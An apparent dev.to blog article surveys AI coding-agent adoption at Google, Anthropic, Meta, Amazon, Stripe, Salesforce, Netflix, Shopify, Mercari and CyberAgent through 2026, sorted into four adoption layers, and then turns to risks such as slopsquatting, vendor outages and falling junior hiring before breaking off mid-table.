&lt;p&gt;Four companies that have driven AI-generated code share to the extreme.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Google: 75% of new code is AI-generated
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L1&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This is the number Sundar Pichai went public with at Google Cloud Next 2026 in April:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;October 2024: ~25% of new code AI-generated&lt;/li&gt;
&lt;li&gt;Fall 2025: 50%&lt;/li&gt;
&lt;li&gt;April 2026: &lt;strong&gt;75%&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;3x in 18 months. Officially, the in-house base model for this is &lt;strong&gt;Gemini 3.1 Pro&lt;/strong&gt;, which engineers use for generation, refactoring, and migrations. "AI-generated" here means "AI-suggested code that humans approved or edited." Every commit still goes through human review and automated tests. AI isn't deploying anything on its own.&lt;/p&gt;

&lt;p&gt;Pichai also pointed at a concrete example: a complex code migration (large internal refactor) that engineers and agents did together finished &lt;strong&gt;6x faster&lt;/strong&gt; than the same kind of work would have taken engineers alone a year before.&lt;/p&gt;

&lt;p&gt;The shape of engineering work is shifting. Less typing. More reviewing and design judgment.&lt;/p&gt;

&lt;h4&gt;
  
  
  But Google's internal reality is a Gemini/Claude two-tier setup
&lt;/h4&gt;

&lt;p&gt;Here's where it gets interesting. Multiple public sources show that &lt;strong&gt;a non-trivial number of Google engineers are actually using Claude Code internally&lt;/strong&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;On January 3, 2026, &lt;strong&gt;Jaana Dogan, a principal engineer on Google's Gemini API team, posted publicly on X&lt;/strong&gt; that Claude Code reproduced a complex distributed-systems design her team had spent a year on, in &lt;strong&gt;about an hour&lt;/strong&gt;. The post got 5.4M views in 24 hours&lt;/li&gt;
&lt;li&gt;BusinessToday reported in April 2026 that &lt;strong&gt;parts of Google DeepMind have official access to Claude Code&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Steve Yegge (well-known ex-Googler) posted on X, citing anonymous Googler sources, that the company has a &lt;strong&gt;two-tier internal world&lt;/strong&gt;: DeepMind people use Claude, and other engineers get pushed into in-house Gemini-based tools&lt;/li&gt;
&lt;li&gt;Alphabet has announced an investment of up to &lt;strong&gt;$40B in Anthropic&lt;/strong&gt; ($10B cash plus $30B tied to milestones). It reads as Alphabet trying to buy its way into Anthropic's lead on coding agents at the corporate level&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fosr65hw5o9a0g4y85kyd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fosr65hw5o9a0g4y85kyd.png" alt="google" width="399" height="629"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So the "75% AI-generated" claim is real, but &lt;strong&gt;the AI on the other side of that number isn't all Gemini&lt;/strong&gt;. There are clearly engineers reaching for Claude Code inside Google. The shift to review-and-judgment work is happening across the company, but underneath that, a quieter selection process is going on for which model is actually best at the job. That's the May 2026 picture.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.2 Anthropic: "most of the code is written by Claude Code"
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L1&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Anthropic's own internal setup is the most extreme thing publicly documented. Their published material ("How Anthropic teams use Claude Code") says outright that the bulk of internal code is now written by Claude Code itself.&lt;/p&gt;

&lt;p&gt;Engineers' actual jobs have collapsed into three things:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Architecture&lt;/strong&gt;: deciding the overall structure&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Product thinking&lt;/strong&gt;: deciding what to build&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Orchestration&lt;/strong&gt;: running agents in parallel and steering them&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;In practice, one engineer runs several Claude Code agents on separate tasks and reviews the PRs they come back with.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fya6mm69b6n48e26degsb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fya6mm69b6n48e26degsb.png" alt="anthropic" width="585" height="660"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In May 2026, Anthropic shipped &lt;strong&gt;Claude Code Auto Mode&lt;/strong&gt;, which exposes that exact workflow externally. Approval gates stay, but the agent drives the task forward on its own. The human just signs off at key points.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.3 Meta: DevMate is filing about half of all code changes
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L1 and L4&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Meta has been pushing an "AI-Native" stance hard since 2025. In December 2025, Mark Zuckerberg said outright that AI is now "core to how work happens."&lt;/p&gt;

&lt;p&gt;Two main internal tools:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;DevMate&lt;/strong&gt;: an internal coding agent built on Anthropic's Claude&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Metamate&lt;/strong&gt;: a general-purpose assistant for everyone in the company&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The number that stands out, from LinearB's reporting: &lt;strong&gt;DevMate already submits roughly 50% of all code changes at Meta&lt;/strong&gt;. The other 50% is human-written, and both go through review before merging.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwmjyz9cj061x7ndo2r37.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwmjyz9cj061x7ndo2r37.png" alt="meta" width="632" height="358"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The interesting part is that Meta isn't holding itself to its own model (Llama). It's running &lt;strong&gt;Claude and Gemini inside its workflows&lt;/strong&gt;. They've explicitly given up on "only our model" and gone with whichever is best per task.&lt;/p&gt;

&lt;p&gt;Meta has also pushed into L4 (the evaluation layer). The Creation Org, which runs Facebook / WhatsApp / Messenger, set a target for the first half of 2026: &lt;strong&gt;65% of engineers should write 75%+ of their code via AI&lt;/strong&gt;. Meta's PR position is that the metric is "outcomes from AI," not "amount of AI usage." Whether the field reads it that way is another question.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.4 Microsoft / GitHub: Copilot moves from completion to agent
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L1&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;GitHub Copilot changed shape in 2026. One company is now carrying all three generations at once.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftpqpjzti42dfnt0cbtcq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftpqpjzti42dfnt0cbtcq.png" alt="microsoft" width="369" height="576"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The center of the 2026 product is &lt;strong&gt;Copilot Coding Agent&lt;/strong&gt;. Assign it an Issue, and it spins up in an isolated GitHub Actions runner, working only on &lt;code&gt;copilot/*&lt;/code&gt; branches. It can't touch &lt;code&gt;main&lt;/code&gt; or any protected branch. It writes code in that sandbox and ships you a PR.&lt;/p&gt;

&lt;p&gt;In early 2026, Copilot also added a public preview that lets users invoke Anthropic's Claude Agent SDK from inside their Copilot subscription. Copilot users can now drive Claude-backed agents.&lt;/p&gt;

&lt;p&gt;And starting June 2026, Copilot moves to &lt;strong&gt;token-based usage billing&lt;/strong&gt;. Premium Request Units go away in favor of GitHub AI Credits. The product is shifting from "all-you-can-eat IDE helper" to something closer to an API service.&lt;/p&gt;




&lt;h2&gt;
  
  
  3. Companies that turned L1 + L2 into real numbers
&lt;/h2&gt;

&lt;p&gt;Two companies that pushed past developer-side AI (L1) and started showing big numbers in &lt;strong&gt;internal operations (L2)&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Amazon: 4,500 person-years saved with Q Developer
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L1 and L2&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Amazon's internal story is all about modernizing legacy applications.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Number&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Amazon-internal Q Developer queries&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;1M+&lt;/strong&gt; in roughly a year&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Engineering effort saved (internal use)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;4,500 person-years&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cost equivalent&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;$260M+&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hours saved&lt;/td&gt;
&lt;td&gt;450,000+&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production apps migrated&lt;/td&gt;
&lt;td&gt;tens of thousands&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The actual workload was things like "Java 8 to Java 17": large language/framework upgrades pushed through agents instead of humans. For a company with AWS-scale legacy code, this is the highest-value AI work they could be doing.&lt;/p&gt;

&lt;p&gt;A note on timing: AWS is &lt;strong&gt;stopping new Q Developer signups on May 15, 2026&lt;/strong&gt; and consolidating their coding-AI products under &lt;strong&gt;Kiro&lt;/strong&gt; (one week from when this article was written). The product is shrinking, but the internal payoff (4,500 person-years) is locked in. Still the largest known L2 result so far.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.2 Stripe: Minions merge 1,300+ PRs a week
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L1 and L2&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Stripe's internal coding agent system is called &lt;strong&gt;Minions&lt;/strong&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PRs merged per week&lt;/strong&gt;: 1,300+&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use cases&lt;/strong&gt;: API integration generation, docs, tests, refactors&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Public benchmark&lt;/strong&gt;: Stripe integration benchmark (an agent benchmark that mirrors a production-like API integration setup)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Minions is built around the idea of a "one-shot, end-to-end agent." Instead of letting a human jump in mid-task, it runs from Issue to PR in one go. If it fails, it retries itself. To make this reliable, Stripe wrote its own &lt;strong&gt;agent harness&lt;/strong&gt;: the runtime that handles environment setup, tool exposure, retries, and state, all in one place.&lt;/p&gt;

&lt;p&gt;For day-to-day editor use, Stripe's adoption of Cursor went from &lt;strong&gt;single-digit percent to over 80% in a short window&lt;/strong&gt;, per co-founder Patrick Collison (it's quoted on Cursor's own customer page). Stripe has roughly 3,000 engineers, so that's at least 2,400 people now coding daily in Cursor.&lt;/p&gt;




&lt;h2&gt;
  
  
  4. Companies that put AI into the customer-facing product
&lt;/h2&gt;

&lt;p&gt;L1 and L2 are still inside the org. From here, &lt;strong&gt;the product itself starts being run by AI&lt;/strong&gt; (L3).&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 Salesforce: Agentforce saved $100M internally and put 18k engineers on Cursor
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L3 and L1&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Salesforce's AI agent platform is &lt;strong&gt;Agentforce&lt;/strong&gt;. Internally, they pointed it at &lt;strong&gt;their own customer support&lt;/strong&gt; first. The numbers Fortune put in print:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Customer conversations handled (internal use): &lt;strong&gt;3 million&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Cost reduction: &lt;strong&gt;$100M+&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Sales opportunities influenced: 3,200+&lt;/li&gt;
&lt;li&gt;Paid Agentforce deals as of March 2026: 6,000+&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Mechanically: a customer hits Agentforce in natural language, and it answers and updates records by reading the knowledge base and the CRM. Only the cases it can't resolve get escalated.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F95iy49bufkezucfup7ni.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F95iy49bufkezucfup7ni.png" alt="salesforce" width="800" height="365"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The whole design has shifted: &lt;strong&gt;AI handles Tier 1/2 autonomously, humans only see the complex cases&lt;/strong&gt;. AI isn't sitting alongside the human anymore. It's the first responder.&lt;/p&gt;

&lt;p&gt;On the developer side, Salesforce moved &lt;strong&gt;90% of its 20,000 engineers onto Cursor&lt;/strong&gt; (per Cursor's own numbers). After rollout, the company says cycle time, PR velocity, and code quality each improved by double digits. So they're hitting both L1 and L3 hard.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.2 Netflix: rebuilding the recommender on Large Foundation Models
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L3&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Netflix is interesting less for coding and more as an example of AI inside the product core.&lt;/p&gt;

&lt;p&gt;The direction they laid out at the &lt;strong&gt;Personalization, Recommendation and Search Workshop (PRS 2025)&lt;/strong&gt; in May 2025: replace the existing recommender with one built on &lt;strong&gt;Large Foundation Models (LFMs)&lt;/strong&gt;. LFMs are internet-scale pretrained models in the same family as the things behind ChatGPT.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1llpnztwvse59ksysh8c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1llpnztwvse59ksysh8c.png" alt="netflix" width="746" height="730"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Concretely, you'll be able to say "something light and funny under 90 minutes for a Friday night" in plain language, and the system will interpret that and serve the right suggestions. This is the conversational recommender direction. The recommendation cards and search bar move toward a chat-style UI.&lt;/p&gt;

&lt;p&gt;Netflix has also been open about cost. They use a two-stage training setup: first stage pretrains a policy without specific reward optimization, second stage adds engineered proxy rewards. Pre-processing and model-training pipeline volume came down by &lt;strong&gt;about 70%&lt;/strong&gt;. "How to run AI cost-efficiently" is going to be the next axis of competition.&lt;/p&gt;




&lt;h2&gt;
  
  
  5. Companies that pushed AI into the org itself (L4)
&lt;/h2&gt;

&lt;p&gt;The last layer. &lt;strong&gt;Embedding AI into evaluation criteria and org design itself&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  5.1 Shopify: Reflexive AI usage as a baseline expectation
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L4 (and L1 across the board)&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The internal memo Tobi Lütke (Shopify CEO) sent in April 2025 is the canonical example of this layer. He posted it publicly himself, so it's not really an internal memo anymore.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Reflexive AI usage is now a baseline expectation at Shopify."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;What that actually does to day-to-day work:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxp2adicg5urz1zogl1r2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxp2adicg5urz1zogl1r2.png" alt="shopify" width="519" height="1173"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Three concrete things this implies:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Before requesting any new headcount, you have to document &lt;strong&gt;why AI can't do this job&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Product designers are required to use AI for &lt;strong&gt;all&lt;/strong&gt; new feature prototypes&lt;/li&gt;
&lt;li&gt;AI use is part of &lt;strong&gt;performance reviews&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is the textbook L4 move. Lütke wrote it for the outside world, on purpose, and the framing has been picked up explicitly in moves at Meta and Mercari. "Can you actually use AI" has been promoted to a baseline engineering skill.&lt;/p&gt;




&lt;h2&gt;
  
  
  6. Japan: Mercari and CyberAgent
&lt;/h2&gt;

&lt;p&gt;Two Japanese companies that are far enough out front to deserve their own section. They both span L1 to L4, so I'm grouping them by country rather than by layer.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.1 Mercari: AI-Native at 95% adoption, plus the ASDD methodology
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L1 to L4 (everything)&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Mercari's numbers are out in the open on their engineering blog.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Number&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Employee AI-tool usage&lt;/td&gt;
&lt;td&gt;95%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI-generated code share in product dev&lt;/td&gt;
&lt;td&gt;70%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Per-engineer output (year over year)&lt;/td&gt;
&lt;td&gt;+64%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI Task Force size&lt;/td&gt;
&lt;td&gt;100+ (40 of them full-time engineers)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Workflows targeted for AI-Native conversion&lt;/td&gt;
&lt;td&gt;~4,000&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The org structure is the unusual part. The "AI Task Force" they kicked off in July 2025 is staffed across 33 domains (legal, finance, HR, and more), with engineers and PMs assigned per domain. &lt;strong&gt;Internal operations (L2) are being rebuilt by full-time engineers, one domain at a time.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The piece that's distinctly Mercari is &lt;strong&gt;Agent-Spec Driven Development (ASDD)&lt;/strong&gt;, published in December 2025. Three points:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Specification format gets standardized first&lt;/strong&gt; so AI agents have the right context&lt;/li&gt;
&lt;li&gt;With the right prompt and spec, less-experienced engineers can drive the agents&lt;/li&gt;
&lt;li&gt;Specialist tacit knowledge gets externalized into something the agents can read&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It's not "make coding faster." It's &lt;strong&gt;rewriting the way design and specs are written so that agents can drive them&lt;/strong&gt;, which is the L1-through-L4 move.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.2 CyberAgent: in-house Japanese LLM and the AI Operations Office
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L2 and L3&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;CyberAgent is unusual for being in on LLM development itself.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;May 2023&lt;/strong&gt;: built a Japanese-language LLM (13B parameters), then released a 6.8B commercially-licensable version&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;October 2023&lt;/strong&gt;: stood up an "AI Operations Office"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2026 target&lt;/strong&gt;: cut existing operations volume by &lt;strong&gt;roughly 60%&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;All-employee reskilling&lt;/strong&gt;: ~6,200 staff went through "Generative AI Comprehensive Understanding" reskilling&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The most successful business application has been bolting LLMs onto an existing AI product: their ad-effectiveness prediction system "Kyoku-Yosoku AI" got an LLM upgrade for accuracy. &lt;strong&gt;It wasn't "use LLMs from scratch." It was "use LLMs to extend an existing AI asset"&lt;/strong&gt;, which is generally the realistic order.&lt;/p&gt;




&lt;h2&gt;
  
  
  7. The whole map: 11 companies plotted on the four layers
&lt;/h2&gt;

&lt;p&gt;Pulling back: &lt;strong&gt;L1 AI-generated-code share has settled into 50–75% as the new floor&lt;/strong&gt;. L2 is producing real numbers in the thousands-of-person-years range. L3 is moving from "augment" to "replace": existing product features are being rebuilt on LLMs. L4 is still rare (Shopify, Meta, Mercari) but spreading.&lt;/p&gt;

&lt;p&gt;One more cross-cutting fact that's worth saying out loud: &lt;strong&gt;the companies actually getting results from coding AI are using Claude&lt;/strong&gt;. Anthropic obviously, Meta's DevMate is Claude-based, Google itself has multiple reports of internal Claude Code use, and Alphabet is putting up to $40B into Anthropic. Reaching for Cursor or Claude Code in May 2026 isn't just a tooling preference. It's also the rational model choice.&lt;/p&gt;




&lt;h2&gt;
  
  
  8. The catches: four problems every company in this article is sitting on
&lt;/h2&gt;

&lt;p&gt;So far I've been describing the side that's pushing forward. If you push this hard and this fast, the side effects show up. Four of them are already visible in May 2026.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdmvvf6vnufafwrjgq366.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdmvvf6vnufafwrjgq366.png" alt="4 problem" width="800" height="413"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  8.1 Security flaws in AI-generated code, and "slopsquatting"
&lt;/h3&gt;

&lt;p&gt;Security was the first thing to break the surface. The 2026 numbers across various security reports:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Number&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AI-generated codebases with at least one critical vuln&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;92%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gartner: AI-generated code with some kind of vuln&lt;/td&gt;
&lt;td&gt;48%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rate at which LLMs recommend nonexistent packages&lt;/td&gt;
&lt;td&gt;~20%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;A new attack surface that came with all this: &lt;strong&gt;slopsquatting&lt;/strong&gt;. The LLM tells you "run &lt;code&gt;npm install&lt;/code&gt; of this library," but &lt;strong&gt;the package literally doesn't exist&lt;/strong&gt;. Attackers register the name the LLM hallucinates first, in the actual registry. The agent installs without a second thought.&lt;/p&gt;

&lt;p&gt;A real example: in January 2026, Aikido Security researcher Charlie Eriksen registered an LLM-hallucinated npm package named &lt;code&gt;react-codeshift&lt;/code&gt; (for research). It propagated into &lt;strong&gt;237 GitHub repositories&lt;/strong&gt;. CSO Online has also called out the practice of copy-pasting MCP server configs from READMEs as a new attack vector ("MCP tool poisoning").&lt;/p&gt;

&lt;h3&gt;
  
  
  8.2 When the model vendor breaks, prod breaks
&lt;/h3&gt;

&lt;p&gt;Anthropic's postmortem on April 23, 2026 (&lt;code&gt;anthropic.com/engineering/april-23-postmortem&lt;/code&gt;) was a big talking point among teams that depend on Claude Code in production:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Three bugs overlapped, and Claude Code quality degraded for ~6 weeks&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Cause 1: reasoning effort silently downgraded from high to medium (Mar 4 to Apr 7)&lt;/li&gt;
&lt;li&gt;Cause 2: a caching bug in chain-of-thought pruning (Mar 26 to Apr 10)&lt;/li&gt;
&lt;li&gt;Cause 3: a system-prompt change to reduce verbosity (Apr 16 to Apr 20)&lt;/li&gt;
&lt;li&gt;Result: power users canceled subscriptions, and security folks publicly warned about "dangerously degraded code quality"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If your org has gone "most of our code is written by Claude Code," you've also signed up for "&lt;strong&gt;a vendor-side internal tweak can drag our quality down for six weeks&lt;/strong&gt;." Internal AI breaking and internal dev grinding to a halt is no longer hypothetical in 2026. Anthropic reset usage limits after the incident and signed a SpaceX compute-capacity deal to absorb demand, but the structural vendor dependency stays.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.3 The collapse of the junior hiring pipeline
&lt;/h3&gt;

&lt;p&gt;This is industry-wide, not specific to one company. Once "prove AI can't do it before hiring" (Shopify's memo) gets copied around, &lt;strong&gt;junior listings dry up&lt;/strong&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Number&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Entry-level hiring at top 15 tech firms (2023→2024)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;-25%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;US junior engineer postings (since early 2024)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~-67%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;UK entry-level tech postings (2024)&lt;/td&gt;
&lt;td&gt;-46%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Employment for ages 22-25 in AI-exposed roles&lt;/td&gt;
&lt;td&gt;-6%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Employment for ages 35-49 in the same roles&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;+9%&lt;/strong&gt;&lt;/td&gt;
